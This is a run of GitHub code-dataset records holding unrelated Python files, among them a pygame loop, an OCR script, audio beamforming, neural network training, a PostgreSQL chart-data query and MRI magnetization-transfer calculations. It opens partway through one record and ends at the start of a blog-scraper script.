player.backpack = saved_player[4]\n player.pos = pygame.Vector2(saved_player[0])\nshop_button= ShopButton(\"Shop\", (700, 0), 30, bg=\"white\", feedback=\"text\")\ndef main():\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n save_map(player, blocks_sprites)\n pygame.quit()\n sys.exit()\n shop_button.click(event)\n if player.pos.y > screen_height // 2:\n offset_y = round(player.pos.y - screen_height // 2, 0)\n elif player.pos.y < screen_height // 2 - 50:\n offset_y = -5\n else:\n offset_y = 0\n\n screen.fill(\"black\")\n all_sprites.update(offset_y)\n all_sprites.draw(screen)\n shop_button.show()\n # display output\n pygame.display.update()\n clock.tick(60)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"leo-grandmorcel/B2","sub_path":"Projet_python/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":10598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"35005399923","text":"import easyocr\nreader = easyocr.Reader(['en'])\nresults = reader.readtext(r'C:\\Users\\XRAJ2\\Downloads\\Screenshot_2022-06-18-15-11-59-227_co.gradeup.android.jpg')\n#a.jpg = D:\\Work\\a.jpg\ntext=''\nfor result in results:\n\ttext += result[1] + ' '\nwith open(\"Image2Text.txt\", \"w\") as scones:\n\tcontents = \"\".join(text)\n\tscones.write(contents)","repo_name":"RKY2023/Projects","sub_path":"Photo2Text.py","file_name":"Photo2Text.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"35076738821","text":"import scipy.io\nimport scipy.io.wavfile\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as pat\nfrom Task3_array_transfer_vector import 
full_array_vector\nimport scipy.fft\nimport scipy.optimize as optimize\n\nfile_names = [\"measurements1\",\"measurements2\",\"measurements3\"]\nsampleRate, audioBuffer = scipy.io.wavfile.read(\"data/\" + file_names[1] + \".wav\")\n\n### TASK 4\n\n# Take one second from the middle of the audio.\naudioBuffer_slice = audioBuffer[5*sampleRate:6*sampleRate]\n# Do FFT for all 16 Elements\nfft_result = np.array([np.fft.rfft(audioBuffer_slice[:,i],8192) for i in range(16)]).T\nprint(audioBuffer_slice[:,0].shape)\n# Calculate Frequencies of the FFT to later calculate the wavelength\nfft_freqs = np.abs(np.fft.rfftfreq(8192)*48000)\n\n# NBDF Algorithm: Beamformer, returns negative absolute for optimization\ndef beamformer(uv,wavelength,R):\n u,v = uv\n a = full_array_vector(u,v,wavelength)\n BF = a.H @ R @ a\n return np.abs(BF)\n\n# Broadband Beamformer: just summing up the BF values for slected Frequency Bins (more bins was to slow)\ndef broadband_beamformer(uv):\n result = 0\n u,v = uv\n for i in range(1,4097,100):\n print(fft_freqs[i])\n # Remove all Frequency values that are not in the selected bin\n Z_freq = np.zeros((4097, 16),np.complex128)\n Z_freq[i,:] = fft_result[i,:]\n # Convert back to time domain\n Z = np.asmatrix(np.array([np.fft.irfft(Z_freq[:,j].T,8192) for j in range(16)]))\n # Calculate Covariance Matrix\n R = (Z @ Z.H) / 48000\n # Use Beamformer to determine power in uv direction and sum up the result for all frequencies\n result = result + beamformer(uv,343/fft_freqs[i],R)\n #result = result + np.abs(full_array_vector(u,v,fft_freqs[i]).H @ fft_result[i,:])**2\n return result\n\n# Plot the Direction Finding Function for all uv values\nif True: \n fig, ax = plt.subplots(1)\n x = np.arange(-1,1,0.1)\n y = np.arange(-1,1,0.1)\n strength = np.zeros((len(x),len(y)),dtype=float)\n for i in range(len(x)):\n for j in range(len(y)):\n strength[i,j] = broadband_beamformer((x[i],y[j]))\n print(i,j)\n\n \n cs = ax.contourf(x,y,strength,cmap='coolwarm')\n\n fig.colorbar(cs)\n plt.savefig('Plots/Broadband_DFF.pdf')\n plt.show()\n\n# TASK 5; The optimization does not work, as there is something wrong with the direction finding function.\n# The algorith terminates at (-1,1) which is outside of the unit circle.\n\n# Convert UV to AZ El Angles\ndef uvtoazel(uv):\n u,v = uv\n return(np.arctan(u/np.sqrt(1-u**2-v**2)),np.arcsin(v))\n# Optimization\nif not True:\n result = optimize.basinhopping(broadband_beamformer,(0.2,-0.1),minimizer_kwargs={'method':'Nelder-Mead', 'bounds':((-0.8,1),(-0.8,1))})\n print (result)\n print('AZ,EL:' + str(np.degrees(uvtoazel(result.x))))\n\n\n \n\n","repo_name":"mj023/array_signal_exercise","sub_path":"Task4_5_direction_finding.py","file_name":"Task4_5_direction_finding.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"6128136875","text":"class Solution:\n def deleteDuplicates(self, head: Optional[ListNode]) -> Optional[ListNode]:\n node=slow=fast=head\n while fast is not None:\n if fast.val != slow.val:\n slow.next = fast\n slow = slow.next\n \n else:\n fast = fast.next\n slow.next=None # 断开与后面重复元素的连接\n return node \n# 像 Java/Python 这类带有垃圾回收的语言,可以帮我们自动找到并回收这些“悬空”的链表节点的内存,而像 C++ 这类语言没有自动垃圾回收的机制,确实需要我们编写代码时手动释放掉这些节点的内存。\n","repo_name":"Emperor19930903/Leetcode","sub_path":"Linked List/Double 
Pointer/83-删除排序链表中的重复元素.py","file_name":"83-删除排序链表中的重复元素.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"31232239147","text":"# function that takes two arguments and always returns the second argument\nzero = lambda x: lambda y: y\n# apply the x function to y\none = lambda x: lambda y: x(y)\n# apply function x twice\ntwo = lambda x: lambda y: x(x(y))\n\nincrement = lambda x: x + 1 # illegal in terms of lambda calculus, just as a starting point\n\n# if we apply function zero to any function, it will behave as identity function\nidentity = zero(increment) # zero doesn't care about the first arg, it will always return the second arg\n\nincrement_one = one(increment)\n\nincrement_twice = two(increment)\n\nsuccessor = lambda w: (lambda y: lambda x: y(w(y)(x))) # w(y)(x) is the old number\n\n# successor of function zero should be the function one\nnew_one = successor(zero)\nnew_increment_one = new_one(increment_one)\n\n\n# successor of function new_one should be the function two\nnew_two = successor(new_one)\nnew_increment_twice = new_two(increment)\n\n\nthree = successor(new_two)\nincrement_thrice = three(increment)\n\n\nnew_three = successor(successor(successor(zero)))\nnew_increment_thrice = new_three(increment)\n\n\nweird = three(three)\n\n\nLAMBDAS = lambda x: 'λ'+x\n\n\nif __name__ == \"__main__\":\n print(identity(0), identity(1))\n print(increment_one(1), increment_one(4))\n print(increment_twice(3))\n # successor\n print(new_increment_one(100) == increment_one(100))\n print(new_increment_twice(22) == increment_twice(22))\n print(increment_thrice(301))\n print(increment_thrice(200) == new_increment_thrice(200))\n # what could be the result\n print(weird(increment)(0))\n print(three(LAMBDAS)(''))\n ","repo_name":"Davidi24/swe211-paradigms","sub_path":"2021-2022/Functional_Programming/lambda_calculus/numbers.py","file_name":"numbers.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"85"} +{"seq_id":"1825828884","text":"\"\"\"\n\nContributed by Wenbin Li & Jinglin Xu\n\n\"\"\"\n\nfrom __future__ import print_function\nimport argparse\nimport os\nimport random\nimport shutil\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nfrom torch.autograd import grad\nimport time\nfrom torch import autograd\nfrom PIL import ImageFile\n\nfrom dataset.AWADataset import animalAttrData\nimport models.network_MvNNcor as MultiviewNet\n\nImageFile.LOAD_TRUNCATED_IMAGES = True\nos.environ['CUDA_DEVICE_ORDER']='PCI_BUS_ID'\nos.environ['CUDA_VISIBLE_DEVICES']='0'\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--dataset_dir', default='./mvdata/Animals_with_Attributes/Features', help='the path of data')\nparser.add_argument('--data_name', default='AWA', help='The name of the data')\nparser.add_argument('--mode', default='train', help='train|val|test')\nparser.add_argument('--outf', default='./results/MvNNcor')\nparser.add_argument('--net', default='', help='use the saved model')\nparser.add_argument('--basemodel', default='multiviewNet', help='multiviewNet')\nparser.add_argument('--workers', type=int, default=8)\nparser.add_argument('--batchSize', type=int, default=64, help='the 
mini-batch size of training')\nparser.add_argument('--testSize', type=int, default=64)\nparser.add_argument('--epochs', type=int, default=100, help='the number of epochs')\nparser.add_argument('--num_classes', type=int, default=50, help='the number of classes')\nparser.add_argument('--num_view', type=int, default=6, help='the number of views')\nparser.add_argument('--fea_out', type=int, default=200, help='the dimension of the first linear layer')\nparser.add_argument('--fea_com', type=int, default=300, help='the dimension of the combination layer')\nparser.add_argument('--lr', type=float, default=0.001, help='learning rate, default=0.001')\nparser.add_argument('--beta1', type=float, default=0.5, help='beta1 for adam. default=0.5')\nparser.add_argument('--cuda', action='store_true', help='enables cuda')\nparser.add_argument('--ngpu', type=int, default=1)\nparser.add_argument('--nc', type=int, default=3, help='input image channels')\nparser.add_argument('--clamp_lower', type=float, default=-0.01)\nparser.add_argument('--clamp_upper', type=float, default=0.01)\nparser.add_argument('--print_freq', '-p', default=1, type=int, metavar='N', help='print frequency (default: 10)')\nparser.add_argument('--gamma', type=float, default=6.0, help='the power of the weight for each view')\n\nopt = parser.parse_args()\nopt.cuda = True\ncudnn.benchmark = True\n\nif torch.cuda.is_available() and not opt.cuda:\n print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")\n\n# save the opt and results to txt file\nopt.outf = opt.outf+'_'+opt.data_name+'_Epochs_'+str(opt.epochs)+'_'+str(opt.gamma)\nif not os.path.exists(opt.outf):\n os.makedirs(opt.outf)\n\ntxt_save_path = os.path.join(opt.outf, 'opt_results.txt')\nF_txt = open(txt_save_path, 'a+')\n\n# ======================================== Folder of Datasets ==========================================\nif opt.data_name == 'AWA':\n\n trainset = animalAttrData(data_dir=opt.dataset_dir, mode=opt.mode)\n valset = animalAttrData(data_dir=opt.dataset_dir, mode='val')\n testset = animalAttrData(data_dir=opt.dataset_dir, mode='test')\n\nprint('Trainset: %d' %len(trainset))\nprint('Valset: %d' %len(valset))\nprint('Testset: %d' %len(testset))\nprint('Trainset: %d' %len(trainset), file=F_txt)\nprint('Valset: %d' %len(valset), file=F_txt)\nprint('Testset: %d' %len(testset), file=F_txt)\n\n# ========================================== Load Datasets ==============================================\ntrain_loader = torch.utils.data.DataLoader(\n trainset, batch_size=opt.batchSize, shuffle=True, \n num_workers=int(opt.workers), drop_last=True, pin_memory=True\n )\nval_loader = torch.utils.data.DataLoader(\n valset, batch_size=opt.testSize, shuffle=True, \n num_workers=int(opt.workers), drop_last=True, pin_memory=True\n ) \ntest_loader = torch.utils.data.DataLoader(\n testset, batch_size=opt.testSize, shuffle=True, \n num_workers=int(opt.workers), drop_last=True, pin_memory=True\n ) \nprint(opt)\nprint(opt, file=F_txt)\n\n# ========================================== Model config ===============================================\ntrain_iter = iter(train_loader)\ntraindata, target = train_iter.next() \nview_list = []\nfor v in range(len(traindata)):\n temp_size = traindata[v].size()\n view_list.append(temp_size[1]) \n\nngpu = int(opt.ngpu)\nmodel = MultiviewNet.define_MultiViewNet(which_model=opt.basemodel, norm='batch', init_type='normal', \n use_gpu=opt.cuda, num_classes=opt.num_classes, num_view=opt.num_view, view_list=view_list,\n fea_out=opt.fea_out, 
fea_com=opt.fea_com)\n\nif opt.net != '': \n model.load_state_dict(torch.load(opt.net))\n\nif opt.ngpu > 1:\n model = nn.DataParallel(model, range(opt.ngpu))\n\nprint(model) \nprint(model, file=F_txt)\n\n# define loss function (criterion) and optimizer\ncriterion = nn.CrossEntropyLoss().cuda()\noptimizer = optim.Adam(model.parameters(), lr=opt.lr, betas=(opt.beta1, 0.9))\n\n# ======================================= Define functions =============================================\ndef reset_grad():\n model.zero_grad()\n\ndef adjust_learning_rate(optimizer, epoch):\n \"\"\"Sets the learning rate to the initial LR decayed by 10 every 30 epochs\"\"\"\n lr = opt.lr * (0.05 ** (epoch // 30))\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\ndef train(train_loader, model, weight_var, gamma, criterion, optimizer, epoch, F_txt):\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n\n # switch to train mode\n model.train()\n\n end = time.time()\n\n for index, (sample_set, sample_targets) in enumerate(train_loader):\n \n # measure data loading time\n data_time.update(time.time() - end)\n\n input_var = [sample_set[i].cuda() for i in range(len(sample_set))]\n\n # deal with the target\n target_var = sample_targets.to(\"cuda\")\n\n # compute output\n Output_list = model(input_var) \n\n weight_up_list = []\n loss = torch.zeros(1).to(\"cuda\")\n\n for v in range(len(Output_list)):\n loss_temp = criterion(Output_list[v], target_var)\n loss += (weight_var[v] ** gamma) * loss_temp\n\n weight_up_temp = loss_temp ** (1/(1-gamma))\n weight_up_list.append(weight_up_temp) \n\n output_var = torch.stack(Output_list)\n\n weight_var = weight_var.unsqueeze(1)\n weight_var = weight_var.unsqueeze(2)\n weight_var = weight_var.expand(weight_var.size(0), opt.batchSize, opt.num_classes)\n output_weighted = weight_var * output_var\n output_weighted = torch.sum(output_weighted, 0)\n\n weight_var = weight_var[:,:,1]\n weight_var = weight_var[:,1]\n weight_up_var = torch.FloatTensor(weight_up_list).to(\"cuda\")\n weight_down_var = torch.sum(weight_up_var)\n weight_var = torch.div(weight_up_var, weight_down_var)\n \n # measure accuracy and record loss\n prec1, prec5 = accuracy(output_weighted, target_var, topk=(1, 5))\n losses.update(loss.item(), target.size(0))\n top1.update(prec1[0], target.size(0))\n top5.update(prec5[0], target.size(0))\n\n # compute gradient and do SGD step\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if index % opt.print_freq == 0:\n print('Train-Epoch: [{0}][{1}/{2}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Data {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\\t'\n 'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(\n epoch, index, len(train_loader), batch_time=batch_time,\n data_time=data_time, loss=losses, top1=top1, top5=top5))\n \n print('Train-Epoch: [{0}][{1}/{2}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Data {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\\t'\n 'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(\n epoch, index, len(train_loader), batch_time=batch_time,\n data_time=data_time, loss=losses, top1=top1, top5=top5), file=F_txt)\n\n return weight_var\n\ndef validate(val_loader, 
model, weight_var, gamma, criterion, best_prec1, F_txt):\n batch_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n\n # switch to evaluate mode\n model.eval()\n\n with torch.no_grad():\n\n end = time.time()\n\n for index, (sample_set, sample_targets) in enumerate(val_loader):\n\n input_var = [sample_set[i].cuda() for i in range(len(sample_set))]\n\n # deal with the target\n target_var = sample_targets.cuda()\n\n Output_list = model(input_var)\n loss = torch.zeros(1).to(\"cuda\")\n\n for v in range(len(Output_list)):\n loss_temp = criterion(Output_list[v], target_var)\n loss += (weight_var[v] ** gamma) * loss_temp\n \n output_var = torch.stack(Output_list)\n weight_var = weight_var.unsqueeze(1)\n weight_var = weight_var.unsqueeze(2)\n weight_var = weight_var.expand(weight_var.size(0), opt.batchSize, opt.num_classes)\n output_weighted = weight_var * output_var\n output_weighted = torch.sum(output_weighted, 0)\n\n weight_var = weight_var[:,:,1]\n weight_var = weight_var[:,1]\n\n # measure accuracy and record loss\n prec1, prec5 = accuracy(output_weighted, target_var, topk=(1, 5))\n losses.update(loss.item(), target.size(0))\n top1.update(prec1[0], target.size(0))\n top5.update(prec5[0], target.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if index % opt.print_freq == 0:\n print('Test: [{0}][{1}/{2}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\\t'\n 'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(\n epoch, index, len(val_loader), batch_time=batch_time,\n loss=losses, top1=top1, top5=top5))\n\n print('Test: [{0}][{1}/{2}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\\t'\n 'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(\n epoch, index, len(val_loader), batch_time=batch_time,\n loss=losses, top1=top1, top5=top5), file=F_txt)\n\n print(' * Prec@1 {top1.avg:.3f} Prec@5 {top5.avg:.3f} Best_Prec@1 {best:.3f}'.format(top1=top1, top5=top5, best=best_prec1))\n print(' * Prec@1 {top1.avg:.3f} Prec@5 {top5.avg:.3f} Best_Prec@1 {best:.3f}'.format(top1=top1, top5=top5, best=best_prec1), file=F_txt)\n \n return top1.avg\n\ndef save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):\n torch.save(state, filename)\n if is_best:\n file_model_best = os.path.join(opt.outf, 'model_best.pth.tar')\n shutil.copyfile(filename, file_model_best)\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\ndef accuracy(output, target, topk=(1,)):\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\n with torch.no_grad():\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\n# ============================================ Training phase ========================================\nprint('start training.........')\nstart_time = time.time()\nbest_prec1 = 
0\nweight_var = torch.ones(opt.num_view) * (1/opt.num_view) \nweight_var = weight_var.to(\"cuda\")\ngamma = torch.tensor(opt.gamma).to(\"cuda\")\n\nfor epoch in range(opt.epochs):\n # adjust the learning rate\n adjust_learning_rate(optimizer, epoch) \n\n # train for one epoch\n weight_var = train(train_loader, model, weight_var, gamma, criterion, optimizer, epoch, F_txt)\n\n # evaluate on validation/test \n print('=============== Testing in the validation set ===============') \n prec1 = validate(val_loader, model, weight_var, gamma, criterion, best_prec1, F_txt) \n\n print('================== Testing in the test set ==================') \n prec2 = validate(val_loader, model, weight_var, gamma, criterion, best_prec1, F_txt) \n\n # remember best prec@1 and save checkpoint\n is_best = prec1 > best_prec1\n best_prec1 = max(prec1, best_prec1)\n\n # save the checkpoint\n filename = os.path.join(opt.outf, 'epoch_%d.pth.tar' %epoch)\n if is_best:\n save_checkpoint(\n {\n 'epoch': epoch + 1,\n 'arch': opt.basemodel,\n 'state_dict': model.state_dict(),\n 'weight_var': weight_var,\n 'best_prec1': best_prec1,\n 'optimizer' : optimizer.state_dict(),\n }, is_best, filename)\n\nprint('======== Training END ========')\nF_txt.close()\n\n# ============================================ Training End ========================================\n","repo_name":"xujinglin/MvNNcor","sub_path":"MvNNcor_Train.py","file_name":"MvNNcor_Train.py","file_ext":"py","file_size_in_byte":14675,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"85"} +{"seq_id":"13212440243","text":"import psycopg2\nimport json\nfrom decimal import Decimal\nimport sys\n\ndef convert_to_float(data):\n if isinstance(data, dict):\n return {convert_to_float(key): convert_to_float(value) for key, value in data.items()}\n elif isinstance(data, list):\n return [convert_to_float(element) for element in data]\n elif isinstance(data, Decimal):\n return float(data) # Convert Decimal to float\n return data\n\ndef get_data3(quarter):\n conn = psycopg2.connect(\n database=\"Candidate_List\",\n user=\"postgres\",\n password=\"Adduvaith789\",\n host=\"localhost\",\n port=\"5432\"\n )\n cursor = conn.cursor()\n if quarter == 'q1':\n cursor.execute(\"SELECT Employee_Category, COUNT(Employee_Category) FROM list WHERE EXTRACT(MONTH FROM Doj) BETWEEN 1 AND 3 GROUP BY Employee_Category;\")\n elif quarter == 'q2':\n cursor.execute(\"SELECT Employee_Category, COUNT(Employee_Category) FROM list WHERE EXTRACT(MONTH FROM Doj) BETWEEN 4 AND 6 GROUP BY Employee_Category;\")\n elif quarter == 'q3':\n cursor.execute(\"SELECT Employee_Category, COUNT(Employee_Category) FROM list WHERE EXTRACT(MONTH FROM Doj) BETWEEN 7 AND 9 GROUP BY Employee_Category;\")\n elif quarter == 'q4':\n cursor.execute(\"SELECT Employee_Category, COUNT(Employee_Category) FROM list WHERE EXTRACT(MONTH FROM Doj) BETWEEN 10 AND 12 GROUP BY Employee_Category;\")\n else:\n cursor.execute(\"SELECT Employee_Category, COUNT(Employee_Category) FROM list GROUP BY Employee_Category;\")\n \n rows = cursor.fetchall()\n category_counts = {\n 'Consultant': 0,\n 'Contract': 0,\n 'Freelancers': 0,\n 'Interns': 0,\n 'Permanent': 0,\n 'Probationary': 0\n }\n \n for row in rows:\n category, count = row\n category_counts[category] = count\n\n cursor.close()\n conn.close()\n\n cols = [\n {\"id\": \"\", \"label\": \"Employee Category\", \"pattern\": \"\", \"type\": \"string\"},\n {\"id\": \"\", \"label\": \"Count\", \"pattern\": \"\", \"type\": \"number\"}\n ]\n rows = [\n {\"c\": 
[{\"v\": \"Permanent\", \"f\": None}, {\"v\": category_counts[\"Permanent\"], \"f\": None}]},\n {\"c\": [{\"v\": \"Contract\", \"f\": None}, {\"v\": category_counts[\"Contract\"], \"f\": None}]},\n {\"c\": [{\"v\": \"Consultant\", \"f\": None}, {\"v\": category_counts[\"Consultant\"], \"f\": None}]},\n {\"c\": [{\"v\": \"Probationary\", \"f\": None}, {\"v\": category_counts[\"Probationary\"], \"f\": None}]},\n {\"c\": [{\"v\": \"Freelancers\", \"f\": None}, {\"v\": category_counts[\"Freelancers\"], \"f\": None}]},\n {\"c\": [{\"v\": \"Interns\", \"f\": None}, {\"v\": category_counts[\"Interns\"], \"f\": None}]}\n ]\n\n data = {\n \"cols\": cols,\n \"rows\": rows\n }\n\n return convert_to_float(data)\n\nif __name__ == '__main__':\n quarter = sys.argv[1] if len(sys.argv) > 1 else ''\n data = get_data3(quarter)\n json_data = json.dumps(data)\n print(json_data)\n","repo_name":"Advaith789/ATS-Using-Google-API","sub_path":"Application Tracking System/graph3.py","file_name":"graph3.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"41268258019","text":"import logging\nimport numpy as np\n\nlogger = logging.getLogger(__name__)\n\n\ndef divide_after_removing_zero(dividend, divisor, threshold, replacement=np.nan):\n \"\"\"\n Mask zero, divide, look for numbers larger than 'threshold', and replace masked elements.\n\n :param dividend: np.array\n :param divisor: np.array\n :param threshold: float\n :param replacement: float: value to replace masked value with.\n :return: result_full\n \"\"\"\n ind_nonzero = np.where(divisor)\n n_zero = divisor.size - len(ind_nonzero[0])\n logger.info(\"Found {} voxels with value=0. These will be replaced by {}.\".format(n_zero, replacement))\n # divide without zero element in divisor\n result = np.true_divide(dividend[ind_nonzero], divisor[ind_nonzero])\n # find aberrant values above threshold\n logger.info(\"Threshold to clip values: +/- {}\".format(threshold))\n np.clip(result, -threshold, threshold, out=result)\n # initiate resulting array with replacement values\n result_full = np.full_like(dividend, fill_value=replacement, dtype='float32')\n result_full[ind_nonzero] = result\n return result_full\n\n\ndef compute_mtr(nii_mt1, nii_mt0, threshold_mtr=100):\n \"\"\"\n Compute Magnetization Transfer Ratio in percentage.\n\n :param nii_mt1: Image object\n :param nii_mt0: Image object\n :param threshold_mtr: float: value above which number will be clipped\n :return: nii_mtr\n \"\"\"\n # Convert input to avoid numerical errors from int16 data\n # Related issue: https://github.com/spinalcordtoolbox/spinalcordtoolbox/issues/3636\n nii_mt1.change_type('float32')\n nii_mt0.change_type('float32')\n\n # Initialize Image object\n nii_mtr = nii_mt1.copy()\n\n # Compute MTR\n nii_mtr.data = divide_after_removing_zero(100 * (nii_mt0.data - nii_mt1.data), nii_mt0.data, threshold_mtr)\n return nii_mtr\n\n\ndef compute_mtsat(nii_mt, nii_pd, nii_t1,\n tr_mt, tr_pd, tr_t1,\n fa_mt, fa_pd, fa_t1,\n nii_b1map=None):\n \"\"\"\n Compute MTsat (in percent) and T1 map (in s) based on FLASH scans\n\n :param nii_mt: Image object for MTw\n :param nii_pd: Image object for PDw\n :param nii_t1: Image object for T1w\n :param tr_mt: Float: Repetition time (in s) for MTw image\n :param tr_pd: Float: Repetition time (in s) for PDw image\n :param tr_t1: Float: Repetition time (in s) for T1w image\n :param fa_mt: Float: Flip angle (in deg) for MTw image\n :param fa_pd: Float: Flip angle (in deg) for 
PDw image\n :param fa_t1: Float: Flip angle (in deg) for T1w image\n :param nii_b1map: Image object for B1-map (optional)\n :return: MTsat and T1map.\n \"\"\"\n # params\n nii_t1map = \\\n None # it would be possible in the future to input T1 map from elsewhere (e.g. MP2RAGE). Note: this T1map\n # needs to be in s unit.\n b1correctionfactor = \\\n 0.4 # empirically defined in https://www.frontiersin.org/articles/10.3389/fnins.2013.00095/full#h3\n # R1 threshold, below which values will be clipped.\n r1_threshold = 0.01 # R1=0.01 s^-1 corresponds to T1=100s which is a reasonable threshold\n # Similarly, we also set a threshold for MTsat values\n mtsat_threshold = 1 # we expect MTsat to be on the order of 0.01\n\n # Convert flip angles into radians\n fa_mt_rad = np.radians(fa_mt)\n fa_pd_rad = np.radians(fa_pd)\n fa_t1_rad = np.radians(fa_t1)\n\n # ignore warnings from division by zeros (will deal with that later)\n seterr_old = np.seterr(over='ignore', divide='ignore', invalid='ignore')\n\n # check if a T1 map was given in input; if not, compute R1\n if nii_t1map is None:\n # compute R1\n logger.info(\"Compute T1 map...\")\n r1map = 0.5 * np.true_divide((fa_t1_rad / tr_t1) * nii_t1.data - (fa_pd_rad / tr_pd) * nii_pd.data,\n nii_pd.data / fa_pd_rad - nii_t1.data / fa_t1_rad)\n # remove nans and clip unrelistic values\n r1map = np.nan_to_num(r1map)\n ind_unrealistic = np.where(r1map < r1_threshold)\n if ind_unrealistic[0].size:\n logger.warning(\"R1 values were found to be lower than {}. They will be set to inf, producing T1=0 for \"\n \"these voxels.\".format(r1_threshold))\n r1map[ind_unrealistic] = np.inf # set to infinity so that these values will be 0 on the T1map\n # compute T1\n nii_t1map = nii_mt.copy()\n nii_t1map.data = 1. / r1map\n else:\n logger.info(\"Use input T1 map.\")\n r1map = 1. / nii_t1map.data\n\n # Compute A\n logger.info(\"Compute A...\")\n a = (tr_pd * fa_t1_rad / fa_pd_rad - tr_t1 * fa_pd_rad / fa_t1_rad) * \\\n np.true_divide(np.multiply(nii_pd.data, nii_t1.data, dtype=float),\n tr_pd * fa_t1_rad * nii_t1.data - tr_t1 * fa_pd_rad * nii_pd.data)\n\n # Compute MTsat\n logger.info(\"Compute MTsat...\")\n nii_mtsat = nii_mt.copy()\n nii_mtsat.data = tr_mt * np.multiply((fa_mt_rad * np.true_divide(a, nii_mt.data) - 1),\n r1map, dtype=float) - (fa_mt_rad ** 2) / 2.\n # remove nans and clip unrelistic values\n nii_mtsat.data = np.nan_to_num(nii_mtsat.data)\n ind_unrealistic = np.where(np.abs(nii_mtsat.data) > mtsat_threshold)\n if ind_unrealistic[0].size:\n logger.warning(\"MTsat values were found to be larger than {}. They will be set to zero for these voxels.\"\n \"\".format(mtsat_threshold))\n nii_mtsat.data[ind_unrealistic] = 0\n # convert into percent unit (p.u.)\n nii_mtsat.data *= 100\n\n # Apply B1 correction to result\n # Weiskopf, N., Suckling, J., Williams, G., Correia, M.M., Inkster, B., Tait, R., Ooi, C., Bullmore, E.T., Lutti,\n # A., 2013. Quantitative multi-parameter mapping of R1, PD(*), MT, and R2(*) at 3T: a multi-center validation.\n # Front. Neurosci. 
7, 95.\n if nii_b1map is not None:\n nii_mtsat.data = np.true_divide(nii_mtsat.data * (1 - b1correctionfactor),\n (1 - b1correctionfactor * nii_b1map.data))\n\n # set back old seterr settings\n np.seterr(**seterr_old)\n\n return nii_mtsat, nii_t1map\n","repo_name":"spinalcordtoolbox/spinalcordtoolbox","sub_path":"spinalcordtoolbox/qmri/mt.py","file_name":"mt.py","file_ext":"py","file_size_in_byte":6151,"program_lang":"python","lang":"en","doc_type":"code","stars":179,"dataset":"github-code","pt":"85"} +{"seq_id":"23315383461","text":"import json\r\nimport time\r\nfrom time import sleep\r\n\r\nimport urllib\r\nfrom urllib.request import Request, urlopen\r\nimport re\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom selenium import webdriver\r\n\r\nimport concurrent.futures\r\n\r\n# ### 알고리즘 ###\r\n# 1. 아이디 입력\r\n# 2. 해당 블로거 최신글 10개 가져오기\r\n# 3. 해시태그와 제목 비교. 키워드 자동생성 클릭시, 일치하는 가장 긴 단어를 추출\r\n# 4. 추출 된 단어는 수정 가능해야함.\r\n# 5. 최종으로 수정된 키워드를 검색 클릭시, 모바일view탭에서 몇위인지 안내.(AD 제외 